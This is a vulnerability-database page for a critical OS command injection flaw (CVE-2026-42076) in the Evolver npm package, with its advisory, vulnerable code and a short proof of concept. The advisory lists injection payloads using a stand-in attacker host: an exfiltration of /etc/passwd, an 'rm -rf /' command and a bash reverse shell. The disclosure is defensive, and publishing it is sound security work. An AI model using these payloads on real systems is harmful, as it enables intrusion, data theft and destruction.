Vulnerability-Lookup

CVE-2026-42076 (GCVE-0-2026-42076)

Vulnerability from cvelistv5 – Published: 2026-05-04 16:48 – Updated: 2026-05-04 16:48

Title

Evolver: Command Injection via `execSync` in `_extractLLM()` function allows Remote Code Execution

Summary

Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a command injection vulnerability in the _extractLLM() function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to execSync() without proper sanitization, enabling remote code execution when the corpus parameter contains shell metacharacters. This issue has been patched in version 1.69.3.

Severity ?

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/EvoMap/evolver/security/adviso…	x_refsource_CONFIRM
	https://github.com/EvoMap/evolver/releases/tag/v1.69.3	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	EvoMap	evolver	Affected: < 1.69.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "evolver",
          "vendor": "EvoMap",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.69.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a command injection vulnerability in the _extractLLM() function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to execSync() without proper sanitization, enabling remote code execution when the corpus parameter contains shell metacharacters. This issue has been patched in version 1.69.3."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-04T16:48:51.446Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53"
        },
        {
          "name": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3"
        }
      ],
      "source": {
        "advisory": "GHSA-j5w5-568x-rq53",
        "discovery": "UNKNOWN"
      },
      "title": "Evolver: Command Injection via `execSync` in `_extractLLM()` function allows Remote Code Execution"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-42076",
    "datePublished": "2026-05-04T16:48:51.446Z",
    "dateReserved": "2026-04-23T19:17:30.565Z",
    "dateUpdated": "2026-05-04T16:48:51.446Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-42076\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-04T17:16:24.440\",\"lastModified\":\"2026-05-04T17:16:24.440\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a command injection vulnerability in the _extractLLM() function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to execSync() without proper sanitization, enabling remote code execution when the corpus parameter contains shell metacharacters. This issue has been patched in version 1.69.3.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"references\":[{\"url\":\"https://github.com/EvoMap/evolver/releases/tag/v1.69.3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-42076

Vulnerability from fkie_nvd - Published: 2026-05-04 17:16 - Updated: 2026-05-04 17:16

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/EvoMap/evolver/releases/tag/v1.69.3
	security-advisories@github.com	https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a command injection vulnerability in the _extractLLM() function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to execSync() without proper sanitization, enabling remote code execution when the corpus parameter contains shell metacharacters. This issue has been patched in version 1.69.3."
    }
  ],
  "id": "CVE-2026-42076",
  "lastModified": "2026-05-04T17:16:24.440",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-04T17:16:24.440",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-J5W5-568X-RQ53

Vulnerability from github – Published: 2026-04-22 22:06 – Updated: 2026-04-22 22:06

Summary

Evolver: Command Injection via `execSync` in `_extractLLM()` function allows Remote Code Execution

Details

Summary

A command injection vulnerability in the _extractLLM() function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to execSync() without proper sanitization, enabling remote code execution when the corpus parameter contains shell metacharacters.

Details

The vulnerability exists in src/gep/signals.js at lines 260-274:

// src/gep/signals.js:260-274
function _extractLLM(corpus, nodeSecret, hubUrl) {
  // ...
  var url = getHubUrl(hubUrl) + '/gep/extract';
  var postData = JSON.stringify({ corpus_summary: summary });

  // VULNERABLE: String concatenation into shell command
  var curlCmd = 'curl -s -m 10 -X POST'
    + ' -H "Content-Type: application/json"'
    + ' -H "Authorization: Bearer ' + nodeSecret + '"'
    + ' -d ' + JSON.stringify(postData).replace(/'/g, "'\\''")
    + ' ' + JSON.stringify(url);

  // VULNERABLE: Executes shell command
  stdout = execSync(curlCmd, { timeout: 12000, encoding: 'utf8' });
  // ...
}

The corpus parameter is derived from user input (via userSnippet in extractSignals() function) and flows through to _extractLLM() where it becomes part of the shell command. While JSON.stringify() escapes some characters, it does not prevent shell command substitution via $(...) syntax when the resulting string is passed to execSync().

The extractSignals() function is called from the main evolution loop in src/gep/evolver.js, which processes user snippets and session transcripts.

PoC

Prerequisites: - Node.js installed - Access to the evolver application

Steps to reproduce:

Create a test file that simulates the vulnerable code path:

// test-command-injection.js
const { execSync } = require('child_process');

// Simulate the vulnerable _extractLLM function
function vulnerableExtractLLM(corpus) {
  const postData = JSON.stringify({ corpus_summary: corpus });
  const curlCmd = 'curl -s -m 10 -X POST'
    + ' -H "Content-Type: application/json"'
    + ' -d ' + JSON.stringify(postData).replace(/'/g, "'\\''")
    + ' http://localhost/test';

  console.log('Command that would be executed:');
  console.log(curlCmd);
  console.log('\n--- Testing command substitution ---');

  // Demonstrate that command substitution works
  const testCmd = 'echo ' + JSON.stringify('$(id)');
  console.log('\nTest with echo:');
  console.log(execSync(testCmd, { encoding: 'utf8' }));
}

// Payload with command injection
const maliciousCorpus = '$(touch /tmp/pwned)';
vulnerableExtractLLM(maliciousCorpus);

Run the test:

node test-command-injection.js

Expected result: The command substitution $(id) is executed by the shell, demonstrating that the same technique could be used with curl to execute arbitrary commands.

Actual exploit scenario: If an attacker can control the userSnippet parameter that flows into extractSignals() (e.g., via compromised log files or malicious user input), they can inject shell commands like: - $(curl attacker.com/exfil?data=$(cat /etc/passwd)) - $(rm -rf /) - $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)

Impact

This is a Remote Code Execution (RCE) vulnerability. An attacker who can control input to the extractSignals() function (whether through compromised log files, malicious user input, or other vectors) can execute arbitrary shell commands with the privileges of the Node.js process. This could lead to: - Full system compromise - Data exfiltration - Installation of malware/backdoors - Lateral movement within the network

Affected users: Anyone running the evolver with the GEP (Genetic Evolution Protocol) enabled and processing user-provided content.

Severity ?

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@evomap/evolver"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.69.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-22T22:06:03Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\nA command injection vulnerability in the `_extractLLM()` function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to `execSync()` without proper sanitization, enabling remote code execution when the `corpus` parameter contains shell metacharacters.\n\n### Details\nThe vulnerability exists in `src/gep/signals.js` at lines 260-274:\n\n```javascript\n// src/gep/signals.js:260-274\nfunction _extractLLM(corpus, nodeSecret, hubUrl) {\n  // ...\n  var url = getHubUrl(hubUrl) + \u0027/gep/extract\u0027;\n  var postData = JSON.stringify({ corpus_summary: summary });\n  \n  // VULNERABLE: String concatenation into shell command\n  var curlCmd = \u0027curl -s -m 10 -X POST\u0027\n    + \u0027 -H \"Content-Type: application/json\"\u0027\n    + \u0027 -H \"Authorization: Bearer \u0027 + nodeSecret + \u0027\"\u0027\n    + \u0027 -d \u0027 + JSON.stringify(postData).replace(/\u0027/g, \"\u0027\\\\\u0027\u0027\")\n    + \u0027 \u0027 + JSON.stringify(url);\n\n  // VULNERABLE: Executes shell command\n  stdout = execSync(curlCmd, { timeout: 12000, encoding: \u0027utf8\u0027 });\n  // ...\n}\n```\n\nThe `corpus` parameter is derived from user input (via `userSnippet` in `extractSignals()` function) and flows through to `_extractLLM()` where it becomes part of the shell command. While `JSON.stringify()` escapes some characters, it does not prevent shell command substitution via `$(...)` syntax when the resulting string is passed to `execSync()`.\n\nThe `extractSignals()` function is called from the main evolution loop in `src/gep/evolver.js`, which processes user snippets and session transcripts.\n\n### PoC\n\n**Prerequisites:**\n- Node.js installed\n- Access to the evolver application\n\n**Steps to reproduce:**\n\n1. Create a test file that simulates the vulnerable code path:\n\n```javascript\n// test-command-injection.js\nconst { execSync } = require(\u0027child_process\u0027);\n\n// Simulate the vulnerable _extractLLM function\nfunction vulnerableExtractLLM(corpus) {\n  const postData = JSON.stringify({ corpus_summary: corpus });\n  const curlCmd = \u0027curl -s -m 10 -X POST\u0027\n    + \u0027 -H \"Content-Type: application/json\"\u0027\n    + \u0027 -d \u0027 + JSON.stringify(postData).replace(/\u0027/g, \"\u0027\\\\\u0027\u0027\")\n    + \u0027 http://localhost/test\u0027;\n  \n  console.log(\u0027Command that would be executed:\u0027);\n  console.log(curlCmd);\n  console.log(\u0027\\n--- Testing command substitution ---\u0027);\n  \n  // Demonstrate that command substitution works\n  const testCmd = \u0027echo \u0027 + JSON.stringify(\u0027$(id)\u0027);\n  console.log(\u0027\\nTest with echo:\u0027);\n  console.log(execSync(testCmd, { encoding: \u0027utf8\u0027 }));\n}\n\n// Payload with command injection\nconst maliciousCorpus = \u0027$(touch /tmp/pwned)\u0027;\nvulnerableExtractLLM(maliciousCorpus);\n```\n\n2. Run the test:\n```bash\nnode test-command-injection.js\n```\n\n**Expected result:** The command substitution `$(id)` is executed by the shell, demonstrating that the same technique could be used with `curl` to execute arbitrary commands.\n\n**Actual exploit scenario:**\nIf an attacker can control the `userSnippet` parameter that flows into `extractSignals()` (e.g., via compromised log files or malicious user input), they can inject shell commands like:\n- `$(curl attacker.com/exfil?data=$(cat /etc/passwd))`\n- `$(rm -rf /)`\n- `$(bash -i \u003e\u0026 /dev/tcp/attacker.com/4444 0\u003e\u00261)`\n\n### Impact\nThis is a **Remote Code Execution (RCE)** vulnerability. An attacker who can control input to the `extractSignals()` function (whether through compromised log files, malicious user input, or other vectors) can execute arbitrary shell commands with the privileges of the Node.js process. This could lead to:\n- Full system compromise\n- Data exfiltration\n- Installation of malware/backdoors\n- Lateral movement within the network\n\n**Affected users:** Anyone running the evolver with the GEP (Genetic Evolution Protocol) enabled and processing user-provided content.",
  "id": "GHSA-j5w5-568x-rq53",
  "modified": "2026-04-22T22:06:03Z",
  "published": "2026-04-22T22:06:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/EvoMap/evolver"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Evolver: Command Injection via `execSync` in `_extractLLM()` function allows Remote Code Execution"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-42076 (GCVE-0-2026-42076)

FKIE_CVE-2026-42076

GHSA-J5W5-568X-RQ53

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature